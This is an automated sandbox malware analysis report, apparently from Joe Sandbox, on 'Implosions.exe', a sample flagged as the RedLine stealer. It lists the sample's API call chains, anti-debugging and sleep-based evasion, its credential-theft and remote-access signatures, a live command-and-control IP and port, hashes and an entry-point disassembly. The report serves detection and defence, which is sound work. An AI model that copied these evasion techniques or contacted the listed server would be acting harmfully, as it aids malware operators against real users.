            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: rasman.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: rtutils.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Implosions.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Implosions.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Implosions.exe, 00000000.00000002.2909439586.000000000074B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: nHC:\Windows\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909012790.0000000000197000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: o.pdbService source: Implosions.exe, 00000000.00000002.2909012790.0000000000197000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbys source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909439586.0000000000705000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909439586.000000000077D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ServiceModel.pdbUN source: Implosions.exe, 00000000.00000002.2911841113.0000000005BD2000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: Implosions.exeStatic PE information: real checksum: 0x23bfb should be: 0x2dee8
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040E21D push ecx; ret 0_2_0040E230
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040BB97 push dword ptr [ecx-75h]; iretd 0_2_0040BBA3
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC3F7 pushfd ; retf 0_2_021BC44E
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC3F7 pushad ; retf 0_2_021BC46A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC408 pushad ; retf 0_2_021BC412
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC420 push esp; retf 0_2_021BC45A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC450 pushad ; retf 0_2_021BC412
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC450 push esp; retf 0_2_021BC45A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC444 push esp; retf 0_2_021BC406
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC444 pushfd ; retf 0_2_021BC44E
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC47C pushfd ; retf 0_2_021BC4BA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC49C pushad ; retf 0_2_021BC46A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC4AC pushfd ; retf 0_2_021BC4BA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC4F0 pushfd ; retf 0_2_021BC4BA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE73E0 push esp; iretd 0_2_05CE759A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE73D3 push ebx; iretd 0_2_05CE73DA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE73D1 push esp; iretd 0_2_05CE73D2
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE83F1 pushad ; iretd 0_2_05CE83F2
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE6DA3 push eax; iretd 0_2_05CE6DAA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE6DA1 push eax; iretd 0_2_05CE6DA2
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE4CC0 pushfd ; iretd 0_2_05CE4CC1
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE6EF3 push ecx; iretd 0_2_05CE6EFA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE6EF1 push edx; iretd 0_2_05CE6EF2
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE6E36 push eax; iretd 0_2_05CE6E3A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE7903 push ebp; iretd 0_2_05CE790A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE7900 push ebp; iretd 0_2_05CE7902
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05D68DA2 push eax; ret 0_2_05D68DB9
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05DEB8E9 push 3005D34Ch; iretd 0_2_05DEB8F5

            Hooking and other Techniques for Hiding and Protection

            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 6677
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Implosions.exeMemory allocated: 2170000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Implosions.exeMemory allocated: 24C0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Implosions.exeMemory allocated: 44C0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\Implosions.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-67171
            Source: C:\Users\user\Desktop\Implosions.exe TID: 7548Thread sleep time: -75000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
            Source: C:\Users\user\Desktop\Implosions.exeAPI call chain: ExitProcess graph end nodegraph_0-67406
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040ADB0 GetProcessHeap,HeapFree,0_2_0040ADB0
            Source: C:\Users\user\Desktop\Implosions.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040E61C
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00416F6A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004123F1 SetUnhandledExceptionFilter,0_2_004123F1
            Source: C:\Users\user\Desktop\Implosions.exeMemory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\Implosions.exeCode function: GetLocaleInfoA,0_2_00417A20
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00412A15
            Source: C:\Users\user\Desktop\Implosions.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: Implosions.exe PID: 7544, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: Implosions.exe PID: 7544, type: MEMORYSTR

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 2 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 23 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

            Source | Detection | Scanner | Label | Link
            Implosions.exe | 71% | ReversingLabs | ByteCode-MSIL.Ransomware.RedLine |
            Implosions.exe | 53% | Virustotal | | Browse
            Implosions.exe | 100% | Avira | HEUR/AGEN.1323343 |
            Implosions.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://ipinfo.io/ip%appdata% | 0% | URL Reputation | safe |
            https://ipinfo.io/ip%appdata% | 0% | URL Reputation | safe |
            http://tempuri.org/Endpoint/CheckConnectResponse | 0% | URL Reputation | safe |
            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX | 0% | URL Reputation | safe |
            https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe |
            http://tempuri.org/Endpoint/CheckConnect | 0% | URL Reputation | safe |
            http://tempuri.org/Endpoint/VerifyUpdateResponse | 0% | URL Reputation | safe |
            http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | URL Reputation | safe |
            https://api.ipify.orgcookies//settinString.Removeg | 0% | URL Reputation | safe |
            http://tempuri.org/Endpoint/GetUpdatesResponse | 0% | URL Reputation | safe |
            http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | URL Reputation | safe |
            http://tempuri.org/0 | 0% | URL Reputation | safe |
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
            http://tempuri.org/ | 0% | Avira URL Cloud | safe |
            http://tempuri.org/Endpoint/CheckConnectLR | 0% | Avira URL Cloud | safe |
            http://109.234.38.212:6677/ | 0% | Avira URL Cloud | safe |
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | Avira URL Cloud | safe |
            http://schemas.xmlsoap.org/soap/envelope/ | 0% | Avira URL Cloud | safe |
            http://tempuri.org/Endpoint/EnvironmentSettingsLR | 0% | Avira URL Cloud | safe |
            http://tempuri.org/Endpoint/SetEnvironmentLR | 0% | Avira URL Cloud | safe |
            http://109.234.38.212:6677/ | 4% | Virustotal | | Browse
            http://schemas.xmlsoap.org/soap/envelope/ | 0% | Virustotal | | Browse
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | Virustotal | | Browse
            109.234.38.212:6677 | 0% | Avira URL Cloud | safe |
            http://tempuri.org/Endpoint/SetEnvironmentLR | 2% | Virustotal | | Browse
            http://schemas.xmlsoap.org/ws/2004/08/addressing | 0% | Avira URL Cloud | safe |
            http://tempuri.org/Endpoint/GetUpdatesLR | 0% | Avira URL Cloud | safe |
            109.234.38.212:6677 | 4% | Virustotal | | Browse
            http://tempuri.org/ | 1% | Virustotal | | Browse
            http://tempuri.org/Endpoint/CheckConnectLR | 2% | Virustotal | | Browse
            http://tempuri.org/Endpoint/VerifyUpdateLR | 0% | Avira URL Cloud | safe |
            http://tempuri.org/Endpoint/ | 0% | Avira URL Cloud | safe |
            http://tempuri.org/Endpoint/EnvironmentSettingsLR | 2% | Virustotal | | Browse
            http://tempuri.org/Endpoint/CheckConnectT | 0% | Avira URL Cloud | safe |
            http://109.234.38.212:6677 | 0% | Avira URL Cloud | safe |
            http://schemas.xmlsoap.org/soap/actor/next | 0% | Avira URL Cloud | safe |
            http://schemas.xmlsoap.org/ws/2004/08/addressing | 0% | Virustotal | | Browse
            http://tempuri.org/Endpoint/ | 1% | Virustotal | | Browse
            http://tempuri.org/Endpoint/CheckConnectT | 2% | Virustotal | | Browse
            http://schemas.xmlsoap.org/soap/actor/next | 0% | Virustotal | | Browse
            http://tempuri.org/Endpoint/VerifyUpdateLR | 2% | Virustotal | | Browse
            http://109.234.38.212:6677 | 4% | Virustotal | | Browse
            http://tempuri.org/Endpoint/GetUpdatesLR | 2% | Virustotal | | Browse
            No contacted domains info
            Name | Malicious | Antivirus Detection | Reputation
            http://109.234.38.212:6677/ | true | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
            109.234.38.212:6677 | true | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
            109.234.38.212 | unknown | Russian Federation | | 48282 | VDSINA-ASRU | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1505369
            Start date and time:2024-09-06 06:36:05 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 57s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Implosions.exe
            Detection:MAL
            Classification:mal100.troj.winEXE@2/0@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 256
            • Number of non-executed functions: 34
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes were analyzed, report is missing behavior information
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            No simulations
            No context
            No context
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            VDSINA-ASRU | aisuru.arm.elf | malicious | Unknown | 94.103.83.102
            | PQ2AUndsdb.exe | malicious | Amadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc | 62.113.117.95
            | SecuriteInfo.com.Win32.PWSX-gen.663.14886.exe | malicious | XRed, XWorm | 62.113.117.95
            | SecuriteInfo.com.BackDoor.AsyncRATNET.1.5719.7945.exe | malicious | AsyncRAT, VenomRAT | 62.113.117.95
            | ExeFile (88).exe | malicious | RedLine | 94.103.86.184
            | SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | malicious | GO Backdoor | 94.103.90.9
            | SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | malicious | GO Backdoor | 94.103.90.9
            | SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe | malicious | GO Backdoor | 195.2.70.38
            | mips.elf | malicious | Unknown | 94.103.91.233
            | Notepad3_v6.23.203.2.exe | malicious | Amadey, GO Backdoor | 195.2.70.38
            No context
            No context
            No created / dropped files found
            File type:PE32 executable (console) Intel 80386, for MS Windows
            Entropy (8bit):7.193904084712107
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:Implosions.exe
            File size:187'904 bytes
            MD5:aeed85e8a5b1d2013ea6fa0348e954d7
            SHA1:899fc5632fce363d0dd1f05bb388f0f3f27240c2
            SHA256:5b1d458a558dbe702742407f213b8a38241555bbded345b0f7c46529b938b3a3
            SHA512:1e81577e9ad438d213f0f229711d0426344582c14637e76250497926af9b4261fc0fa63697321a20255fa3b6895b605589c6641304888b8fdbfc78bfd3d8a677
            SSDEEP:3072:RDKW1LgppLRHMY0TBfJvjcTp5Xew7T79dLTrpMu6:RDKW1Lgbdl0TBBvjc/ew/79Do
            TLSH:4E04AE117181C1B3C4B7117044E6CB7A9E7A30720B6A96D7B7DD2BBA6E213D1A3362CD
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~........................PE..L...t..P..........#........
            Icon Hash:90cececece8e8eb0
            Entrypoint:0x40cd2f
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows cui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:TERMINAL_SERVER_AWARE
            Time Stamp:0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:0
            File Version Major:5
            File Version Minor:0
            Subsystem Version Major:5
            Subsystem Version Minor:0
            Import Hash:bf5a4aa99e5b160f8521cadd6bfe73b8
            Instruction
            call 00007FD44C812986h
            jmp 00007FD44C80CB49h
            mov edi, edi
            push ebp
            mov ebp, esp
            sub esp, 20h
            mov eax, dword ptr [ebp+08h]
            push esi
            push edi
            push 00000008h
            pop ecx
            mov esi, 0041F058h
            lea edi, dword ptr [ebp-20h]
            rep movsd
            mov dword ptr [ebp-08h], eax
            mov eax, dword ptr [ebp+0Ch]
            pop edi
            mov dword ptr [ebp-04h], eax
            pop esi
            test eax, eax
            je 00007FD44C80CCAEh
            test byte ptr [eax], 00000008h
            je 00007FD44C80CCA9h
